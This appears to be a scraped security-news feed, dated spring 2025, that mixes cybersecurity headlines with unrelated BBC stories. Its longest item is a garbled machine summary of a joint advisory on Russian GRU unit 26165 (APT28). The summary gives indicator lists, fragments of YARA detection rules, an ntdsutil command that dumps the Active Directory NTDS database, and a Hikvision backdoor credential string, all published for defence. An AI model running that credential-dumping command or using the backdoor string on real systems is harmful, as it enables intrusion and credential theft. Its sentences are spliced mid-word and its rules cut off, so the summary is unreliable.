News

The threat landscape in the bioeconomy is different from what most CISOs are used to. It includes traditional risks like data breaches, but the consequences are more complex. A compromise of genomic databases, for example, does not just expose personal health data. It can also leak proprietary genetic sequences that represent years of research and investment. These are not just privacy violations; they are breaches that can cripple a business’s future R&D pipeline. One example … More →

The post CISOs, are you ready for cyber threats in biotech? appeared first on Help Net Security.

In this Help Net Security interview, Michael Metzler, Vice President Horizontal Management Cybersecurity for Digital Industries at Siemens, discusses the cybersecurity implications of deploying AI agents in industrial environments. He talks about the risks that come with AI agents making semi-autonomous decisions, and why a layered security approach like Defense-in-Depth is key to keeping industrial systems safe. What are the implications of an AI agent being compromised in a critical infrastructure environment, such as an … More →

The post How AI agents reshape industrial automation and risk management appeared first on Help Net Security.

In this Help Net Security interview, Carrie Mills, VP and CISO, Southwest Airlines talks about the cybersecurity challenges facing the aviation industry. She explains how being part of critical infrastructure, a major consumer brand, and an airline each brings its own set of security issues. What are the most pressing cyber threats currently facing the aviation industry? Southwest is not only an airline but also a well-known consumer brand and part of a United States … More →

The post Southwest Airlines CISO on tackling cyber risks in the aviation industry appeared first on Help Net Security.

Executive Summary

This joint cybersecurity advisory (CSA) highlights a Russian state-sponsored cyber campaign targeting Western logistics entities and technology companies. This includes those involved in the coordination, transport, and delivery of foreign assistance to Ukraine. Since 2022, Western logistics entities and IT companies have faced an elevated risk of targeting by the Russian General Staff Main Intelligence Directorate (GRU) 85th Main Special Service Center (85th GTsSS), military unit 26165—tracked in the cybersecurity community under several names (see “Cybersecurity Industry Tracking”). The actors’ cyber espionage-oriented campaign, targeting technology companies and logistics entities, uses a mix of previously disclosed tactics, techniques, and procedures (TTPs). The authoring agencies expect similar targeting and TTP use to continue.

Executives and network defenders at logistics entities and technology companies should recognize the elevated threat of unit 26165 targeting, increase monitoring and threat hunting for known TTPs and indicators of compromise (IOCs), and posture network defenses with a presumption of targeting.

This cyber espionage-oriented campaign targeting logistics entities and technology companies uses a mix of previously disclosed TTPs and is likely connected to these actors’ wide scale targeting of IP cameras in Ukraine and bordering NATO nations.

The following authors and co-sealers are releasing this CSA:

• United States National Security Agency (NSA)
• United States Federal Bureau of Investigation (FBI)
• United Kingdom National Cyber Security Centre (NCSC-UK)
• Germany Federal Intelligence Service (BND) Bundesnachrichtendienst
• Germany Federal Office for Information Security (BSI) Bundesamt für Sicherheit in der Informationstechnik
• Germany Federal Office for the Protect "

  Autosummary: *.000[.]pe *.1cooldns[.]com *.42web[.]io *.4cloud[.]click *.accesscan[.]org *.bumbleshrimp[.]com *.camdvr[.]org *.casacam[.]net *.ddnsfree[.]com *.ddnsgeek[.]com *.ddnsguru[.]com *.dynuddns[.]com *.dynuddns[.]net *.free[.]nf *.freeddns[.]org *.frge[.]io *.glize[.]com *.great-site[.]net *.infinityfreeapp[.]com *.kesug[.]com *.loseyourip[.]com *.lovestoblog[.]com *.mockbin[.]io *.mockbin[.]org *.mocky[.]io *.mybiolink[.]io *.mysynology[.]net *.mywire[.]org *.ngrok[.]io *.ooguy[.]com *.pipedream[.]net *.rf[.]gd Outlook CVE Exploitation IOCs md-shoeb@alfathdoor[.]com[.]sa jayam@wizzsolutions[.]com accounts@regencyservice[.]in m.salim@tsc-me[.]com vikram.anand@4ginfosource[.]com mdelafuente@ukwwfze[.]com sarah@cosmicgold469[.]co[.]za franch1.lanka@bplanka[.]com commerical@vanadrink[.]com maint@goldenloaduae[.]com karina@bhpcapital[.]com tv@coastalareabank[.]com ashoke.kumar@hbclife[.]in 213[.]32[.]252[.]221 124[.]168[.]91[.]178 194[.]126[.]178[.]8 159[.]196[.]128[.]120 Commonly Used Webmail Providers portugalmail[.]pt mail-online[.]dk email[.]cz seznam[.]cz Malicious Archive Filenames Involving CVE-2023-38831 calc.war.zip news_week_6.zip Roadmap.zip SEDE-PV-2023-10-09-1_EN.zip war.zip Zeyilname.zip Brute Forcing IP Addresses Disclaimer: These IP addresses date June 2024 through August 2024. Utilities and scripts Legitimate utilities Unauthorized or unusual use of the following legitimate utilities can be an indication of a potential compromise: ntdsutil – A legitimate Windows executable used by threat actors to export contents of Active Directory wevtutil – A legitimate Windows executable used by threat actors to delete event logs vssadmin – A legitimate Windows executable possibly used by threat actors to make a copy of the server’s C: drive ADexplorer – A legitimate window executable to view, edit, and backup Active Directory Certificate Services OpenSSH – The Windows version of a legitimate open source SSH client schtasks – A legitimate Windows executable used to create persistence using scheduled tasks whoami – A legitimate Windows executable used to retrieve the name of the current user tasklist – A legitimate Windows executable used to retrieve the list of running processes hostname – A legitimate Windows executable used to retrieve the device name arp – A legitimate Windows executable used to retrieve the ARP table for mapping the network environment systeminfo – A legitimate Windows executable used to retrieve a comprehensive summary of device and operating system information net – A legitimate Windows executable used to retrieve detailed user information wmic – A legitimate Windows executable used to interact with Windows Management Instrumentation (WMI), such as to retrieve letters assigned to logical partitions on storage drives cacls – A legitimate Windows executable used to modify permissions on files icacls – A legitimate Windows executable used to modify permissions to files and handle integrity levels and ownership ssh – A legitimate Windows executable used to establish network shell connections reg – A legitimate Windows executable used to add to or modify the system registry Note: Additional heuristics are needed for effective hunting for these and other living off the land (LOTL) binaries to avoid being overwhelmed by false positives if these legitimate management tools are used regularly. The countries with targeted entities include the following, as illustrated in Figure 1: Bulgaria Czech Republic France Germany Greece Italy Moldova Netherlands Poland Romania Slovakia Ukraine United States Figure 1: Countries with Targeted Entities Initial Access TTPs To gain initial access to targeted entities, unit 26165 actors used several techniques to gain initial access to targeted entities, including (but not limited to): Credential guessing [T1110.001] / brute forceIPAddressToString" $command_7 = "@(0x4e,0x54,0x4c,0x4d, 0x53,0x53,0x50,0x00,0x02,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x28,0x00,0x00,0x01,0x82,0x00,0x00,0x11,0x22,0x33,0x44,0x55,0x66,0x77,0x88,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00)" $command_8 = ".AllKeys" $variable_1 = "$NTLMAuthentication" nocase $variable_2 = "$NTLMType2" nocase $variable_3 = "$listener" nocase $variable_4 = "$hostip" nocase $variable_5 = "$request" nocase $variable_6 = "$ntlmt2" nocase $variable_7 = "$NTLMType2Response" nocase $variable_8 = "$buffer" nocase condition: 5 of ($command_*) or all of ($variable_*) } HEADLACE shortcut rule APT28_HEADLACE_SHORTCUT { meta: description = "Detects the HEADLACE backdoor shortcut dropper.These accounts contained information on aid shipments to Ukraine, including: sender, recipient, train/plane/ship numbers, point of departure, destination, container registration numbers, travel route, and cargo contents.Militaire Inlichtingen- en Veiligheidsdienst Download the PDF version of this report: For a downloadable list of IOCs, visit: Introduction For over two years, the Russian GRU 85th GTsSS, military unit 26165—commonly known in the cybersecurity community as APT28, Fancy Bear, Forest Blizzard, BlueDelta, and a variety of other identifiers—has conducted this campaign using a mix of known tactics, techniques, and procedures (TTPs), including reconstituted password spraying capabilities, spearphishing, and modification of Microsoft Exchange mailbox permissions.An open source python script for finding insecure passwords stored in Group Policy Preferences ldap-dump.py – A script for enumerating user accounts and other information in Active Directory Hikvision backdoor string: “YWRtaW46MTEK” Suspicious command lines While the following utilities are legitimate, and using them with the command lines shown may also be legitimate, these command lines are often used during malicious activities and could be an indication of a compromise: edge.exe “-headless-new -disable-gpu” ntdsutil.exe "activate instance ntds" ifm "create full C:\temp\[a-z]{3}" quit quit ssh -Nf schtasks /create /xml[T1021.001] to access additional hosts and attempt to dump Active Directory NTDS.dit domain databases [T1003.003] using native Active Directory Domain Services commands, such as in Figure 2: Example Active Directory Domain Services command: C:\Windows\system32 tdsutil.exe "activate instance ntds" ifm "create full C:\temp\[a-z]{3}" quit quit Figure 2: Example Active Directory Domain Services command Additionally, GRU unit 26165 actors used the tools Certipy and ADExplorer.exe to exfiltrate information from the Active Directory.From a sample available to the authoring agencies of over 10,000 cameras targeted via this effort, the geographic distribution of victims showed a strong focus on cameras in Ukraine and border countries, as shown in Table 1: Table 1: Geographic distribution of targeted IP cameras Country Percentage of Total Attempts Ukraine 81.0% Romania 9.9% Poland 4.0% Hungary 2.8% Slovakia 1.7% Others 0.6% Mitigation Actions General Security Mitigations Architecture and Configuration Employ appropriate network segmentation [D3-NI] and restrictions to limit access and utilize additional attributes (such as device information, environment, and access path) when making access decisionsThere were a number of known malware variants tied to this campaign against logistics sector victims, including: HEADLACE [7] MASEPIE [8] While other malware variants, such as OCEANMAP and STEELHOOK, [8] were not directly observed targeting logistics or IT entities, their deployment against victims in other sectors in Ukraine and other Western countries suggest that they could be deployed against logistics and IT entities should the need arise.Bezpečnostní informační služba Poland Internal Security Agency (ABW) Agencja Bezpieczeństwa Wewnętrznego Poland Military Counterintelligence Service (SKW) Służba Kontrwywiadu Wojskowego United States Cybersecurity and Infrastructure Security Agency (CISA) United States Department of Defense Cyber Crime Center (DC3) United States Cyber Command (USCYBERCOM) Australian Signals Directorate’s Australian Cyber Security Centre (ASD’s ACSC)Redirector services used include: Webhook[.]site FrgeIO InfinityFree Dynu Mocky Pipedream Mockbin[.]org The actors also used spearphishing to deliver malware (including HEADLACE and MASEPIE) executablesCSeq: 2 Authorization: Digest username="admin", realm="[a-f0-9]{12}", algorithm="MD5", nonce="[a-f0-9]{32}", uri="", response="[a-f0-9]{32}" User-Agent: "

  ---

  BREAKING: 7,000-Device Proxy Botnet Using IoT, EoL Systems Dismantled in U.S. - Dutch Operation

  industry
  2025-05-09 https://thehackernews.com/2025/05/breaking-7000-device-proxy-botnet-using.html
  A joint law enforcement operation undertaken by Dutch and U.S. authorities has dismantled a criminal proxy network that"s powered by thousands of infected Internet of Things (IoT) and end-of-life (EoL) devices, enlisting them into a botnet for providing anonymity to malicious actors. In conjunction with the domain seizure, Russian nationals, Alexey Viktorovich Chertkov, 37, Kirill Vladimirovich "

  Autosummary: In conjunction with the domain seizure, Russian nationals, Alexey Viktorovich Chertkov, 37, Kirill Vladimirovich Morozov, 41, Aleksandr Aleksandrovich Shishkin, 36, and Dmitriy Rubtsov, 38, a Kazakhstani national, have been charged by the U.S. Department of Justice (DoJ) for operating, maintaining, and profiting from the proxy services. To mitigate the risks posed by such proxy botnets, users are advised to regularly reboot routers, install security updates, change default passwords, and upgrade to newer models once they reach EoL status. "

  ---

  Unsophisticated cyber actors are targeting the U.S. Energy sector

  industry
  2025-05-07 https://securityaffairs.com/177551/security/unsophisticated-cyber-actors-are-targeting-the-u-s-energy-sector.html
  CISA, FBI, EPA, and DoE warn of cyberattacks on the U.S. Energy sector carried out by unsophisticated cyber actors targeting ICS/SCADA systems. The US cybersecurity agency CISA, the FBI, EPA, and the DoE issued a joint alert to warn of cyberattacks targeting US-based organizations in the oil and natural gas sector. Unsophisticated threat actors are […] "

  Autosummary: "

  ---

  Medical device maker Masimo warns of cyberattack, manufacturing delays

  industry ciber
  2025-05-07 https://www.bleepingcomputer.com/news/security/medical-device-maker-masimo-warns-of-cyberattack-manufacturing-delays/
  Medical device company Masimo Corporation warns that a cyberattack is impacting production operations and causing delays in fulfilling customers" orders. [...] "

  Autosummary: "

  ---

  CISA warns of hackers targeting critical oil infrastructure

  industry
  2025-05-07 https://www.bleepingcomputer.com/news/security/cisa-warns-of-hackers-targeting-critical-oil-infrastructure/
  CISA warned critical infrastructure organizations of "unsophisticated" threat actors actively targeting the U.S. oil and natural gas sectors. [...] "

  Autosummary: "

  ---

  Hackers Exploit Samsung MagicINFO, GeoVision IoT Flaws to Deploy Mirai Botnet

  exploits industry
  2025-05-06 https://thehackernews.com/2025/05/hackers-exploit-samsung-magicinfo.html
  Threat actors have been observed actively exploiting security flaws in GeoVision end-of-life (EoL) Internet of Things (IoT) devices to corral them into a Mirai botnet for conducting distributed denial-of-service (DDoS) attacks. The activity, first observed by the Akamai Security Intelligence and Response Team (SIRT) in early April 2025, involves the exploitation of two operating system command "

  Autosummary: "

  ---

  A list of topics we covered in the week of April 27 to May 3 of 2025

  industry
  2025-05-05 https://www.malwarebytes.com/blog/news/2025/05/a-list-of-topics-we-covered-in-the-week-of-april-27-to-may-3-of-2025
  A list of topics we covered in the week of April 27 to May 3 of 2025 "

  Autosummary: Error. "

  ---

  Two dead after Peruvian navy ship hits oil platform in Amazon River

  latam industry
  2025-05-02 https://www.bbc.com/news/articles/cy70zlzrgd8o
  Thirty crew members were rescued from the vessel, while one person remains missing, Peru"s defence ministry says. "

  Autosummary: "

  ---

  DarkWatchman, Sheriff Malware Hit Russia and Ukraine with Stealth and Nation-Grade Tactics

  exploits industry
  2025-05-01 https://thehackernews.com/2025/05/darkwatchman-sheriff-malware-hit-russia.html
  Russian companies have been targeted as part of a large-scale phishing campaign that"s designed to deliver a known malware called DarkWatchman. Targets of the attacks include entities in the media, tourism, finance and insurance, manufacturing, retail, energy, telecom, transport, and biotechnology sectors, Russian cybersecurity company F6 said. The activity is assessed to be the work of a "

  Autosummary: Targets of the attacks include entities in the media, tourism, finance and insurance, manufacturing, retail, energy, telecom, transport, and biotechnology sectors, Russian cybersecurity company F6 said. "

  ---

  Download: Edgescan 2025 Vulnerability Statistics Report

  exploits industry
  2025-04-30 https://www.helpnetsecurity.com/2025/04/30/edgescan-2025-vulnerability-statistics/
  

  Edgescan’s 2025 Vulnerability Statistics Report explores risk density patterns across network/device and application layers, uncovers complex vulnerabilities that automated tools consistently miss, and evaluates the real-world effectiveness of leading vulnerability scoring methodologies, including EPSS, CISA KEV, CVSS, and our proprietary EVSS system. This year’s findings reveal significant industry variances in vulnerability remediation efficiency, with software companies achieving the fastest mean time to remediate (63 days), while construction sector organizations lag considerably (104 days). Edgescan also … More →

  The post Download: Edgescan 2025 Vulnerability Statistics Report appeared first on Help Net Security.

  "

  Autosummary: "

  ---

  Eyes, ears, and now arms: IoT is alive

  industry
  2025-04-29 https://www.helpnetsecurity.com/2025/04/29/humanoid-robots-security/
  

  I’ve never quite seen anything like this in my two decades of working in the Internet of Things (IoT) space. In just a few years, devices at home and work started including cameras to see and microphones to hear. Now, with new lines of vacuums and emerging humanoid robots, devices have appendages to manipulate the world around them. They’re not only able to collect information about their environment but can touch, “feel”, and move it. … More →

  The post Eyes, ears, and now arms: IoT is alive appeared first on Help Net Security.

  "

  Autosummary: Likewise, users can more safely participate in the robot revolution by segmenting their home networks, implementing multi-factor authentication, and regularly reviewing device permissions.Armed with, well, arms, this evolution interconnects cybersecurity with physical security.This means following best practice cybersecurity by enabling peer-to-peer connectivity, outlawing generic credentials, and supporting software throughout the device lifecycle. "

  ---

  The Turmoil Following BreachForums Shutdown: Confusion, Risks, and a New Beginning

  industry
  2025-04-28 https://securityaffairs.com/177146/hacking/the-turmoil-following-breachforums-shutdown-confusion-risks-and-a-new-beginning.html
  BreachForums, a major data leak marketplace, shut down on April 15 after a MyBB 0-day exploit allowed law enforcement infiltration. On April 15, BreachForums, one of the top marketplaces for stolen data, abruptly shut down, fueling widespread speculation. Rumors ranged from FBI raids and the arrest of the administrator. In the aftermath, several alternative forums […] "

  Autosummary: The Turmoil Following BreachForums Shutdown: Confusion, Risks, and a New Beginning Pierluigi Paganini April 28, 2025 April 28, 2025 BreachForums, a major data leak marketplace, shut down on April 15 after a MyBB 0-day exploit allowed law enforcement infiltration. "

  ---

  DslogdRAT Malware Deployed via Ivanti ICS Zero-Day CVE-2025-0282 in Japan Attacks

  exploits industry
  2025-04-25 https://thehackernews.com/2025/04/dslogdrat-malware-deployed-via-ivanti.html
  Cybersecurity researchers are warning about a new malware called DslogdRAT that"s installed following the exploitation of a now-patched security flaw in Ivanti Connect Secure (ICS). The malware, along with a web shell, were "installed by exploiting a zero-day vulnerability at that time, CVE-2025-0282, during attacks against organizations in Japan around December 2024," JPCERT/CC researcher Yuma "

  Autosummary: The malware, along with a web shell, were "installed by exploiting a zero-day vulnerability at that time, CVE-2025-0282, during attacks against organizations in Japan around December 2024," JPCERT/CC researcher Yuma Masubuchi said in a report published Thursday. "

  ---

  A new era of cyber threats is approaching for the energy sector

  industry
  2025-04-24 https://www.helpnetsecurity.com/2025/04/24/energy-sector-cyber-threats/
  

  Cyber threats targeting the energy sector come in many forms, including state-sponsored actors seeking to disrupt national infrastructure, cybercriminals motivated by profit, and insiders intentionally causing damage. The consequences of a successful attack can be severe, potentially disrupting energy supplies and causing economic and social damage, according to Darktrace’s research focused on the UK and US energy sector over a three-year period (November 2021 – Dec 2024). Email as the initial attack vector As seen … More →

  The post A new era of cyber threats is approaching for the energy sector appeared first on Help Net Security.

  "

  Autosummary: Email as the initial attack vector As seen in cases from both the US and UK, and across energy customers of all types, 55% of incidents involved email or SaaS, making it the most frequent attack vector. The consequences of a successful attack can be severe, potentially disrupting energy supplies and causing economic and social damage, according to Darktrace’s research focused on the UK and US energy sector over a three-year period (November 2021 – Dec 2024). "

  ---

  "God chose this day" - World"s Catholics mourn Pope"s Easter death

  industry
  2025-04-21 https://www.bbc.com/news/articles/c5y656415lzo
  Members of the Catholic Church"s global community of 1.4bn people are remember the late Pope on Easter Monday. "

  Autosummary: "It was incredible to feel listened to... through the years I"ve told him I feel like Lazarus: you were dead, nobody hears you, nobody cares, and suddenly the most important person does care, and sincerely cares, and makes a big change. Getty Images Worshippers gathered at Baclaran Church in Paranaque, Metro Manila, to pay their respects to the late Pope Catholics in rebel-held Bukavu, a city in eastern Democratic Republic of Congo, have gathered at Notre-Dame de la Paix Cathedral to mourn.One woman who heard his address said: "He took his duty to the people so seriously - even when he was so unwell yesterday, he still came out, he was still part of the Easter mass, he still got to speak to us." "

  ---

  Experts Uncover New XorDDoS Controller, Infrastructure as Malware Expands to Docker, Linux, IoT

  exploits industry Linux
  2025-04-18 https://thehackernews.com/2025/04/experts-uncover-new-xorddos-controller.html
  Cybersecurity researchers are warning of continued risks posed by a distributed denial-of-service (DDoS) malware known as XorDDoS, with 71.3 percent of the attacks between November 2023 and February 2025 targeting the United States. "From 2020 to 2023, the XorDDoS trojan has increased significantly in prevalence," Cisco Talos researcher Joey Chen said in a Thursday analysis.  "

  Autosummary: "

  ---

  Review: Hands-On Industrial Internet of Things

  industry
  2025-04-17 https://www.helpnetsecurity.com/2025/04/17/review-hands-on-industrial-internet-of-things/
  

  Hands-On Industrial Internet of Things is a practical guide designed specifically for professionals building and securing industrial IoT (IIoT) systems. About the authors Giacomo Veneri brings deep expertise in telecommunications and AI, shaped by over 25 years in IoT and AI applications within industrial environments. As Director of AI Specialists at Baker Hughes, he spearheads machine learning innovations that bridge cutting-edge research with practical, real-world solutions. Antonio Capasso offers extensive experience managing large-scale IT projects … More →

  The post Review: Hands-On Industrial Internet of Things appeared first on Help Net Security.

  "

  Autosummary: The authors cover essential areas like secure data flow setups, analytics, and visualizations using secure, industry-standard tools such as Azure Cosmos DB, Grafana, and Azure Synapse. "

  ---

  Cyber threats against energy sector surge as global tensions mount

  industry
  2025-04-17 https://www.helpnetsecurity.com/2025/04/17/cyber-threats-against-energy-sector-surge/
  

  Cyberattacks targeting the energy sector are increasing, driven by a host of geopolitical and technological factors. A report published by Sophos in July 2024, and which surveyed 275 cybersecurity and IT leaders from the energy, oil/gas, and utilities sector across 14 countries, found 67% of respondents who said their organizations had suffered a ransomware attack in the last year. While Sophos’ figure remained steady year-over-year, a January 2025 report authored by TrustWave said that ransomware … More →

  The post Cyber threats against energy sector surge as global tensions mount appeared first on Help Net Security.

  "

  Autosummary: According to EPRI’s Wikipedia page, the institute is an American “independent, nonprofit organization that conducts research and development related to the generation, delivery, and use of electricity to help address challenges in the energy industry, including reliability, efficiency, affordability, health, safety, and the environment.” Access & data brokers Other notable energy sector data leaks and access listings observed by Resecurity, and which are at heightened risk of being weaponized by ransomware actors and other threat actors, include: 30 GB of confidential data from Qatar Gas, ADNOC Offshore, and Bell Energy Office 365 Exchange Access for a U.S. energy firm that generates $6 billion in annual revenue Network remote code execution access to “the largest energy company in North Africa” The Emirates-focused data leaks were published on the XSS cybercrime forum on December 28, 2024. By citing the export control part of GE’s network, the threat actor is likely referencing servers or databases storing classified or controlled technical data, network segments linked to military contracts, or sensitive R&D. On January 28, the threat actor wrote a follow-up post to their initial thread and claimed the GE global network access credentials offer entry points to servers, network devices, firewalls, load balancers, and VPN accounts. Energy sector victims allegedly compromised by Handala include: BLEnergy – a leading battery energy storage systems (BESS) integrator and provider in Israel ELitech – a company providing engineering and project management services to renewable energy, private power plants, gas insulated substations (GIS), defense and military projects, and projects requiring a high degree of technological expertise In July 2024, Handala published a post on the RAMP cybercrime forum announcing that the hack and leak of 145 GB of data belonging to BLenergy.According to the company’s webpage, “IKAV is an international asset management group that provides institutional investors with investment solutions spanning a broad range of infrastructure energy assets, including solar, concentrated solar power, wind, energy efficiency, geothermal, thermal power plants and upstream.” In a ransom announcement that has since been removed from HellCat’s data leak site (DLS), the threat group claimed the “breach has compromised critical data, including projects, issues, and plugins, along with over 400,000 rows of user data, totaling more than 40GB Compressed Data.”PLCs targeted in this attack campaign are “commonly used in the Water and Wastewater Systems (WWS) Sector and used in other industries including, but not limited to, energy, food and beverage manufacturing, transportation systems, and healthcare,” according to CISA. In this post, the threat actor claims to have access to over 5,000 stolen PDF files related to the United Arab Emirates nuclear program, including inspection reports, security procedures, technical documents, invoices, and other documents.According to BleepingComputer, the platform “often contains sensitive data, such as source code, authentication keys, IT plans, customer information, and internal discussions related” to these software development projects.This access listing claimed to include administrative passwords for routers, switches, F5s, WASS’s, ISE, firewalls, and proxies. VPN access for a Greek nuclear energy company Electric Power Research Institute (EPRI) database GE network logins, including access to nuclear power plants DDoS attack on Framatome in France DDoS attacks on Doel and Tihange nuclear plants in Belgium The Malaysian Nuclear Agency database leak was posted on Breach Forums on December 3, 2024 by a threat actor who goes by the handle ‘Ciph3r.’[Hacktivist] Based on this compilation of leading threat actors, defenders should be especially aware of HellCat’s tactics, techniques, and procedures (TTPs), specifically their reliance on infostealer attack chains, with an emphasis on Lumma malware.This threat intelligence research is a continuation of our material published last year – “Ransomware Attacks against the Energy Sector on the rise – Nuclear and Oil & Gas are Major Targets in 2024“, highlighting threat actors targeting energy installations in North America, Asia, and the European Union, including nuclear facilities and related research entities. The threat actors claimed the attack inflicted the following cyber-physical damage: “The valves were broken, the seals were damaged by increasing the pressure, the server failed, the flow power in the group settings was increased, which will inevitably lead to wear of the equipment and strategically important parts for work.” According to the December Cyble report, Z-Pentest claimed to have disrupted “critical systems at an oil well site, including systems responsible for water pumping, petroleum gas flaring, and oil collection.” While there is no substantive link between the johnsherlock access broker persona and Midnight Blizzard, the critical nature of this type of access listing, combined with the geoeconomically sensitive nature of the victim’s industry category (energy), and the relatively high price of the listing, merit closer investigation.Two prominent pro-Russia hacktivist groups that have generated publicity for their energy-sector targeting, despite general skepticism regarding their claims, are ‘Z-Pentest’ and its partner organization, ‘Sector 16’ (S16).A 6-minute screen recording posted by the threat actor showed “detailed screenshots of the facility’s control systems, showing tank setpoints, vapor recovery metrics, and operational dashboards allegedly accessed and changed during the breach,” according to Cyble. "

  ---

  Symbiotic Security v1 empowers developers to write secure code

  industry
  2025-04-17 https://www.helpnetsecurity.com/2025/04/17/symbiotic-security-version-1/
  

  Symbiotic Security launched Symbiotic Security version 1 that ensures code security keeps pace with development speed, by using AI to secure code in real-time through remediation and training integrated within their workflows. Symbiotic Security v1 empowers developers to write secure code from the outset during the development process, and maximize the productivity gains of AI-assisted coding. Its intelligent detection and remediation identifies vulnerabilities in real-time, instantly providing secure code suggestions that developers can accept, modify, … More →

  The post Symbiotic Security v1 empowers developers to write secure code appeared first on Help Net Security.

  "

  Autosummary: The built-in AI chatbot builds developers’ security skills, delivering specific training on any vulnerabilities it detects, then explaining remediation strategies, and generating suggested fixes. “Making security a positive experience for developers is key to growing their cyber judgement and knowledge,” said Edouard Viot, CTO, Symbiotic Security. "

  ---

  Cyber Threats Against Energy Sector Surge as Global Tensions Mount

  industry
  2025-04-16 https://securityaffairs.com/176591/hacking/cyber-threats-against-energy-sector-surge-as-global-tensions-mount.html
  Resecurity warns of rising cyberattacks on the energy sector, some linked to large-scale campaigns targeting national infrastructure for geopolitical aims. Resecurity warns about the increase in targeted cyberattacks against enterprises in the energy sector worldwide. Some of these attacks represent much larger campaigns designed to target country-level infrastructure, acting as tools for geopolitical influence. It is […] "

  Autosummary: Cyber Threats Against Energy Sector Surge as Global Tensions Mount Pierluigi Paganini April 16, 2025 April 16, 2025 Resecurity warns of rising cyberattacks on the energy sector, some linked to large-scale campaigns targeting national infrastructure for geopolitical aims. "

  ---

  Initial Access Brokers Shift Tactics, Selling More for Less

  industry
  2025-04-11 https://thehackernews.com/2025/04/initial-access-brokers-shift-tactics.html
  What are IABs? Initial Access Brokers (IABs) specialize in gaining unauthorized entry into computer systems and networks, then selling that access to other cybercriminals. This division of labor allows IABs to concentrate on their core expertise: exploiting vulnerabilities through methods like social engineering and brute-force attacks.  By selling access, they significantly mitigate the "

  Autosummary: For detailed insights into contemporary IAB tactics, including access types, privilege usage, and recommended protective measures, consult the comprehensive IAB guide or attend our talk at this year"s RSA conference by Adi Bleih, Security Researcher titled Initial Access Brokers – A Deep Dive on April 30th at 2:25pm in HT-W09.Therefore, proactive cyber security measures, including threat intelligence on up to date TTPs, continuous monitoring, and employee training, will become increasingly critical in mitigating the growing threat posed by IABs.While 2023 saw an average listing price of $1,979, skewed by occasional high-value targets reaching tens of thousands of dollars, the median price remained significantly lower at $1,000, with a majority of listings below $3,000. "

  ---

  OpenAI sues Elon Musk claiming "bad-faith tactics"

  industry
  2025-04-10 https://www.bbc.com/news/articles/cg4114271x2o
  Claim follows Mr Musk"s own lawsuit earlier this year against OpenAI"s Sam Altman. "

  Autosummary: In February, Mr Musk made an unsolicited bid for OpenAI, offering to buy it for $97.4 billion, which Mr Altman rejected by posting: "no thank you but we will buy twitter for $9.74 billion if you want." "

  ---

  Security Theater: Vanity Metrics Keep You Busy - and Exposed

  industry
  2025-04-07 https://thehackernews.com/2025/04/security-theater-vanity-metrics-keep.html
  After more than 25 years of mitigating risks, ensuring compliance, and building robust security programs for Fortune 500 companies, I’ve learned that looking busy isn’t the same as being secure.  It’s an easy trap for busy cybersecurity leaders to fall into. We rely on metrics that tell a story of the tremendous efforts we’re expending - how many vulnerabilities we patched, how fast we "

  Autosummary: We rely on metrics that tell a story of the tremendous efforts we"re expending - how many vulnerabilities we patched, how fast we responded - but often vulnerability management metrics get associated with operational metrics because traditional approaches to measuring and implementing vulnerability management does not actually reduce risk.Attackers chain together exposures - misconfigurations, overprivileged identities, unpatched CVEs - to reach high-value targets.Whether it"s credential misuse, missing patches, open ports, or cloud misconfigurations, this breakdown informs both tactical response and strategic planning. Taken together and continuously updated, meaningful metrics give you more than a snapshot - they provide a living, contextual view of your threat exposure.They typically fall into three main types: Volume metrics – These count things: patches applied, vulnerabilities discovered, scans completed. "

  ---

  A revolution is underway in India"s trainer industry

  industry
  2025-04-07 https://www.bbc.com/news/articles/cm2nplgm2kpo
  India wants to boost the domestic trainer industry but will small domestic makers suffer? "

  Autosummary: "Most homegrown brands rely on off-the-shelf soles from the market, but when we started Comet, we realized that these were lacking in quality, durability, and grip," he says.Sabhib Agrawal is trying to get those buyers interested in barefoot footwear - shoes which, their makers say, are healthy for the foot as they encourage natural, or barefoot, movement."Many consumers, especially in rural and lower-income urban areas, opt for cheaper local footwear instead of branded options," he says. "

  ---

  AI Threats Are Evolving Fast — Learn Practical Defense Tactics in this Expert Webinar

  industry
  2025-04-03 https://thehackernews.com/2025/04/ai-threats-are-evolving-fast-learn.html
  The rules have changed. Again. Artificial intelligence is bringing powerful new tools to businesses. But it"s also giving cybercriminals smarter ways to attack. They’re moving quicker, targeting more precisely, and slipping past old defenses without being noticed. And here"s the harsh truth: If your security strategy hasn’t evolved with AI in mind, you’re already behind. But you’re not alone—and "

  Autosummary: What You"ll Learn: How attackers are using AI—and how you can think like them The latest threat trends you might not know about yet Easy-to-follow strategies for securing AI use in your company Why Zero Trust is key to staying safe is key to staying safe A practical approach to building long-term cyber resilience Cyber threats won"t wait. "

  ---

  ⚡ Weekly Recap: Chrome 0-Day, IngressNightmare, Solar Bugs, DNS Tactics, and More

  exploits industry
  2025-03-31 https://thehackernews.com/2025/03/weekly-recap-chrome-0-day.html
  Every week, someone somewhere slips up—and threat actors slip in. A misconfigured setting, an overlooked vulnerability, or a too-convenient cloud tool becomes the perfect entry point. But what happens when the hunters become the hunted? Or when old malware resurfaces with new tricks? Step behind the curtain with us this week as we explore breaches born from routine oversights—and the unexpected "

  Autosummary: This week"s list includes — CVE-2025-2783, CVE-2025-2476 (Google Chrome), CVE-2025-2857 (Mozilla Firefox, Tor Browser), CVE-2025-1974 (Kubernetes NGINX Ingress Controller), CVE-2025-26512 (NetApp SnapCenter), CVE-2025-22230 (VMware Tools for Windows), CVE-2025-2825 (CrushFTP), CVE-2025-20229 (Splunk), CVE-2025-30232 (Exim), CVE-2025-1716, CVE-2025-1889, CVE-2025-1944, CVE-2025-1945 (picklescan), and CVE-2025-2294 (Kubio AI Page Builder plugin).Previously, the duo revealed multiple vulnerabilities in Phoenix Contact CHARX SEC-3100, an electric vehicle (EV) charger controller, that could facilitate privilege escalation and remote code execution (CVE-2024-6788, CVE-2024-25994, CVE-2024-25995, and CVE-2024-25999).This malware harvests sensitive data such as system metadata, files matching certain extensions, running processes, installed software, and user credentials, as well as information from cryptocurrency wallets, messaging applications, and web browsers.This malware harvests sensitive data such as system metadata, files matching certain extensions, running processes, installed software, and user credentials, as well as information from cryptocurrency wallets, messaging applications, and web browsers.46 Flaws in Solar Inverters From Sungrow, Growatt, and SMA — As many as 46 security bugs have discovered in products from three solar inverter vendors, Sungrow, Growatt, and SMA that, if successfully exploited, could permit attackers to seize control of devices and cause potential power blackouts.With support for multiple scanning modes, advanced discovery techniques, and customizable payloads, Dalfox offers deep insights into reflected, stored, and DOM-based XSS vulnerabilities—all while providing detailed, developer-friendly output.Exploiting Car 